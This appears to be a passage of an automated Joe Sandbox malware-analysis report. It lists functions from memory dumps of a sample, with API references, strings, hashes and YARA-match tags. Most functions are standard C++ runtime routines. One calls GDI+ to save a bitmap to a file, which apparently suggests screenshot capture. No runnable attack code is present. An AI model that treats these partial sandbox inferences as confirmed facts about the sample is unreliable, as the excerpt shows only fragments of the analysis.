Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 0063C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0063C401
int.LIBCPMT ref: 0063C418

Part of subcall function 0063BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0063BFD4
Part of subcall function 0063BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0063BFEE

std::locale::_Getfacet.LIBCPMT ref: 0063C421
std::_Facet_Register.LIBCPMT ref: 0063C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0063C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0063C486

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: dade3db7b49871104b7583d8d25b31b19a04e7d07bfee529225d6465f99bedc4
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 0511CE718002289BCB54FBA4D855AED7BB2AF40720F20411DF811BB292DF349E05CBE8

Function 00634E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00634E8C
int.LIBCPMT ref: 00634EA3

Part of subcall function 0063BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0063BFD4
Part of subcall function 0063BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0063BFEE

std::locale::_Getfacet.LIBCPMT ref: 00634EAC
std::_Facet_Register.LIBCPMT ref: 00634EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 00634EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 00634F11

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 9c265b31328da24e5a9787ce1db6eb50e2abfe51c9360d88e4d8cf18ebf4b2ae
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: E611AC318002289BCB54EBA4E801AEEB7B2BF44310F24011DF510AB292DF75AE05CBD8

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

CorExitProcess, xrefs: 0042FF0F
mscoree.dll, xrefs: 0042FEFD

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0063C87F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0063C8DE

Strings

ios_base::eofbit set, xrefs: 0063C8B0
ios_base::failbit set, xrefs: 0063C8AB
ios_base::badbit set, xrefs: 0063C8A1, 0063C8C1
|5c, xrefs: 0063C8C2, 0063C8CF, 0063C8D2

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$|5c
API String ID: 2005118841-3046679971
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: f4774c97b5d404306804422ea0e89979eec5326047c3d113b88c1495aa7ca47e
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 47F02B739002086ACB44E654CC42BEA37A9DF16321F14806BFD42BB183EA799E05CBE4

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 006708F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 006708F8
make_shared.LIBCPMT ref: 00670943

Strings

RCC, xrefs: 0067092A
v)D, xrefs: 006708F3
MOC, xrefs: 0067091B

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: 69a54e881591ee2e3def1e9a75a70b6d3c6064453d4e221a8183287162f3657a
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: FBF04F71A00615DFFB52FF64C4026AC3762AF01B01F859099F9445B262DB785D48CBE9

Function 0065B36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: 19dab38a1b84f611b09974e19fd872f636f7a30a98f12a79540798fdde640c45
Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction Fuzzy Hash: B771927190021A9BCF398F58C885AFEBBB7FF55312F245229EC1157281E7708D4ACBA1

Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9

Function 00660CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0066390E: RtlAllocateHeap.NTDLL(00000000,0063DAD7,00000000), ref: 00663940

_free.LIBCMT ref: 00660DB6
_free.LIBCMT ref: 00660DCD
_free.LIBCMT ref: 00660DEC
_free.LIBCMT ref: 00660E07
_free.LIBCMT ref: 00660E1E

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: b19f1559ce0ba0de8da7bde25e4fa5c599f75c71f5027b7e338c6b6ef3ba8eb0
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: FA51A171A00304AFEB619F69C841AABB7F6EF59720F14466DE809D7350E731EE01CB84

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 00661742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006617B4
_free.LIBCMT ref: 006617D4

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 1744332eeafb32109d8219edc62b6e0ecb681211b19a4d1fbd1639304637a5be
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: F441CF36A002149BDB10DFB8C980A9DB7E6EF86714B1945ADEA05EF381D731ED01CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 0064B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0064B152

Part of subcall function 00641188: _SpinWait.LIBCONCRT ref: 006411A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0064B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0064B198
List.LIBCMT ref: 0064B21B
List.LIBCMT ref: 0064B22A

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: d1a975dcfa9def6ae4aafa589fdce2462b3bfcda9d4896c3de88e34ab82c581d
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 05319832E04616DFCB14EFA4C9A16EDBBB2BF05308F14106ED8116B742CB71AE44CB98

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 006350C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 006350A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 006350B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0063511C
__Getcoll.LIBCPMT ref: 0063512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0063513B

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 9f1946c993679d7274d83c6888e9b0ada17f33ba138e47d33ad6dd366492b4f4
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: F1219AB1814604AFDB80EFA4C8457DDB7B2BF50325F10806DF486AB282DBB49A44CBD9

Function 006621C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0063DAD7,0063DAD7,00000002,0065ED35,00663951,00000000,?,00656A05,00000002,00000000,00000000,00000000,?,0063CF88,0063DAD7,00000004), ref: 006621CA
_free.LIBCMT ref: 006621FF
_free.LIBCMT ref: 00662226
SetLastError.KERNEL32(00000000,?,0063DAD7), ref: 00662233
SetLastError.KERNEL32(00000000,?,0063DAD7), ref: 0066223C

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: ed75af87d60e887b92d89dcec6ff5b28b78748e84277973af798970ffa44bf20
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 6F01FE35145F027B93116B345C76D5B265FBBD2B72B20013CF515D2391EE718E05416D

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 00662141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

